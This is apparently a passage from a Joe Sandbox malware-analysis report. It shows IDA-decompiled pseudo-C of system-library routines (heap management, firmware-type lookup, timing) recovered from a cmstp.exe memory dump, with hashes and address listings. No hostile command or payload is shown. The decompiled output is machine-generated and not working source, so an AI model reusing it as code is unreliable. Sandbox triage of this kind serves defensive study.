Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 71fa476057a95bdd3b1cda96b399d89e4975c5db9d9ad09dad68df84fc5d9687
Instruction ID: 73ad8076d64603bc26c32822bc6d6f0f2b67ac9c3fa9ffc6c3223cd5d9994c23
Opcode Fuzzy Hash: 71fa476057a95bdd3b1cda96b399d89e4975c5db9d9ad09dad68df84fc5d9687
Instruction Fuzzy Hash: 6B11B1353182029BDB28DB19E484F7DB7A6FB80620F19802DE10ACB641DB70D881DF51

Uniqueness

Uniqueness Score: -1.00%

Function 0519E539 Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0519E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0519BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0519BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0519AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E05119730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0519A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0519A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E05119730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0519A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0519A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E050F2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E050EB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E050EFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E050F7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0518FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x0519e547
0x0519e549
0x0519e54f
0x0519e553
0x0519e557
0x0519e55a
0x0519e55c
0x0519e55f
0x0519e561
0x0519e567
0x0519e56b
0x0519e7e2
0x00000000
0x0519e571
0x0519e575
0x0519e577
0x0519e57b
0x0519e57c
0x0519e57d
0x0519e57e
0x0519e57f
0x0519e588
0x0519e58f
0x0519e591
0x0519e592
0x0519e592
0x0519e596
0x0519e59e
0x0519e5a0
0x0519e5a6
0x0519e61d
0x0519e61d
0x0519e621
0x0519e623
0x0519e630
0x0519e630
0x0519e7e6
0x0519e7eb
0x0519e7ed
0x0519e7f4
0x0519e7fa
0x0519e7ff
0x0519e7ff
0x0519e80a
0x0519e812
0x0519e812
0x0519e5ab
0x0519e5b4
0x0519e5b9
0x0519e5be
0x0519e5c0
0x0519e5c2
0x0519e5c8
0x0519e5c9
0x0519e5cb
0x0519e5cc
0x0519e5d5
0x0519e5e4
0x0519e5f1
0x0519e5f8
0x0519e5f8
0x0519e5d5
0x0519e602
0x0519e616
0x0519e63d
0x0519e644
0x0519e64d
0x0519e652
0x0519e657
0x0519e659
0x0519e65b
0x0519e661
0x0519e662
0x0519e664
0x0519e665
0x0519e66e
0x0519e67d
0x0519e68a
0x0519e691
0x0519e691
0x0519e66e
0x0519e6b0
0x00000000
0x0519e6b6
0x0519e6bd
0x0519e6c7
0x0519e6d7
0x0519e6d9
0x0519e6db
0x0519e6de
0x0519e6e3
0x0519e6f3
0x0519e6fc
0x0519e700
0x0519e700
0x0519e704
0x0519e70a
0x0519e70a
0x0519e713
0x0519e716
0x0519e719
0x0519e720
0x0519e761
0x0519e76b
0x0519e774
0x0519e77a
0x0519e77a
0x0519e78a
0x0519e791
0x0519e799
0x0519e79b
0x0519e79f
0x0519e7aa
0x0519e7c0
0x0519e7ac
0x0519e7b2
0x0519e7b9
0x0519e7b9
0x0519e7c7
0x0519e806
0x00000000
0x0519e7c9
0x0519e7d1
0x0519e7d8
0x00000000
0x0519e7d8
0x00000000
0x00000000
0x0519e722
0x0519e72e
0x0519e748
0x0519e74c
0x0519e754
0x0519e756
0x0519e75c
0x0519e75c
0x00000000
0x0519e75c
0x0519e758
0x0519e758
0x00000000
0x0519e758
0x0519e750
0x00000000
0x00000000
0x0519e752
0x00000000
0x0519e752
0x0519e730
0x0519e735
0x0519e73d
0x0519e73f
0x00000000
0x00000000
0x0519e741
0x0519e741
0x00000000
0x0519e741
0x0519e739
0x00000000
0x00000000
0x0519e73b
0x00000000
0x0519e73b
0x0519e722
0x0519e720
0x0519e6b0
0x0519e618
0x00000000
0x0519e618

Strings

`, xrefs: 0519E670
`, xrefs: 0519E5D7

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 511001df4052cf2a5e21a838d264845537405385282335896ad939247246a741
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: A09170353083419FEB28DE25C845B5BB7EABF84714F148A2DF596CB280E774E904CB92

Uniqueness

Uniqueness Score: -1.00%

Function 051551BE Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E051551BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x51b05f0);
				E0512D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E050EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E051553CA(0);
						return E0512D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0511F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E050F3690(1, _t117, 0x50b1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0511AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L050F4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0511AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0515500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E05119860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x051551be
0x051551c3
0x051551c8
0x051551cd
0x051551d0
0x051551d3
0x051551d8
0x051551db
0x051551de
0x051551e0
0x051551e3
0x051551e6
0x051551e8
0x05155342
0x05155351
0x05155356
0x0515535a
0x05155360
0x05155363
0x05155366
0x05155369
0x05155369
0x0515536b
0x0515536b
0x05155370
0x051553a3
0x051553a4
0x051553a6
0x051553ab
0x051553ab
0x051553ae
0x051553ae
0x051553b5
0x051553bf
0x051553bf
0x05155375
0x05155396
0x051553a0
0x051553a0
0x00000000
0x05155396
0x05155377
0x05155379
0x0515537f
0x0515538c
0x05155390
0x00000000
0x05155390
0x051551ee
0x051551f1
0x05155301
0x05155310
0x05155315
0x05155318
0x0515531b
0x05155320
0x0515532e
0x05155331
0x00000000
0x05155331
0x05155328
0x05155329
0x00000000
0x05155329
0x051551fa
0x05155235
0x05155236
0x05155239
0x0515523f
0x05155240
0x05155241
0x05155242
0x05155246
0x05155247
0x0515524e
0x05155251
0x05155267
0x05155269
0x0515526e
0x0515527d
0x0515527e
0x05155281
0x05155282
0x05155287
0x05155288
0x0515528a
0x0515528f
0x05155294
0x00000000
0x00000000
0x0515529a
0x0515529c
0x0515529e
0x0515529e
0x051552a4
0x051552b0
0x00000000
0x00000000
0x051552ba
0x051552bc
0x051552bc
0x051552d4
0x051552d9
0x051552dc
0x051552e1
0x00000000
0x00000000
0x051552e7
0x051552f4
0x00000000
0x051552f4
0x05155270
0x00000000
0x05155270
0x051551fc
0x051551fd
0x05155202
0x05155203
0x05155205
0x0515520a
0x0515520f
0x00000000
0x00000000
0x0515521b
0x05155226
0x0515522b
0x0515521d
0x0515521d
0x05155222
0x05155222
0x0515522d
0x00000000

Strings

Legacy, xrefs: 05155226
UEFI, xrefs: 0515521D

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 2c0ca2214f1460a7f45a024f1289d898b16b530cb10fbb9fae464b8c7cca10d8
Instruction ID: bb3f9ad6099eaeb40c51575006df136972d708a114c0959712ba9f6b565af1c6
Opcode Fuzzy Hash: 2c0ca2214f1460a7f45a024f1289d898b16b530cb10fbb9fae464b8c7cca10d8
Instruction Fuzzy Hash: 25517C71E04608DFDB24DFA8D894EAEBBBABF48710F16402DEA59EB251D7709901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 050FB944 Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E050FB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x51cd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E050F7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E051A8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E05119E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0511B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0511CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E050F7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E051A8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0511AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x51c8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x51c862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x51c8628; // 0x0
							_t116 =  *0x51c862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x050fb94c
0x050fb956
0x050fb95c
0x050fb95e
0x050fb964
0x050fb969
0x050fb96d
0x050fb96d
0x050fb970
0x050fb974
0x050fb97a
0x050fbadf
0x050fbadf
0x050fbae2
0x050fbae4
0x050fbae6
0x050fbaf0
0x05142cb8
0x050fbaf6
0x050fbaf6
0x050fbaf6
0x050fbafd
0x050fbb1f
0x050fbb1f
0x050fbaff
0x050fbb00
0x050fbb00
0x050fbb03
0x050fbb03
0x050fbacb
0x050fbacf
0x050fbad0
0x050fbad1
0x050fbadc
0x050fbadc
0x050fb980
0x050fb980
0x050fb988
0x050fb98b
0x050fb98d
0x050fb990
0x050fb993
0x050fb999
0x050fb99b
0x050fb9a1
0x050fb9a5
0x050fb9aa
0x050fb9b0
0x050fb9bb
0x050fb9c0
0x050fb9c3
0x050fb9ca
0x050fb9cc
0x050fb9cf
0x050fb9d3
0x050fb9d7
0x050fba94
0x050fba94
0x050fba98
0x050fbaa3
0x05142ccb
0x050fbaa9
0x050fbaa9
0x050fbaa9
0x050fbab1
0x05142cd5
0x05142cdd
0x05142cdd
0x050fbabb
0x050fbabc
0x050fbac2
0x050fbac3
0x050fbac3
0x050fbac6
0x00000000
0x050fb9dd
0x050fb9dd
0x050fb9e7
0x050fb9e7
0x050fb9ec
0x050fb9ec
0x050fb9f1
0x050fb9f5
0x050fb9fa
0x050fba00
0x050fba0c
0x050fba10
0x050fba10
0x050fba12
0x050fba18
0x00000000
0x00000000
0x050fbb26
0x050fbb26
0x050fba1e
0x050fba1e
0x050fba23
0x050fba25
0x050fba2c
0x050fba30
0x050fba35
0x050fba35
0x050fba41
0x050fba46
0x050fba4c
0x050fba50
0x050fba54
0x050fba6a
0x050fba6e
0x050fba70
0x050fba74
0x050fba78
0x050fba7a
0x050fba7c
0x050fba8e
0x050fba90
0x050fba92
0x050fbb14
0x050fbb14
0x050fbb16
0x050fbb16
0x00000000
0x050fba7c
0x050fbb0a
0x050fbb0d
0x00000000
0x00000000
0x00000000
0x050fbb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 050FB9A5

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: f5c4f9bdbecfc5c72b6e6ddcc4134b4386359a7d7c63c2cfb875f7cffc7119c4
Instruction ID: 924c9f4b659a59a56545fd4d02ac52b101164c56e55c72d5b3798d6de596ba09
Opcode Fuzzy Hash: f5c4f9bdbecfc5c72b6e6ddcc4134b4386359a7d7c63c2cfb875f7cffc7119c4
Instruction Fuzzy Hash: D2515871A08351DFC720DF29D08092EBBE6FB88610F14896EFA9587B54DB71E844CF92

Uniqueness

Uniqueness Score: -1.00%

Function 050DB171 Relevance: 1.7, APIs: 1, Instructions: 166
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E050DB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x51af7a8);
				E0512D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0512D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0511D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0511F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
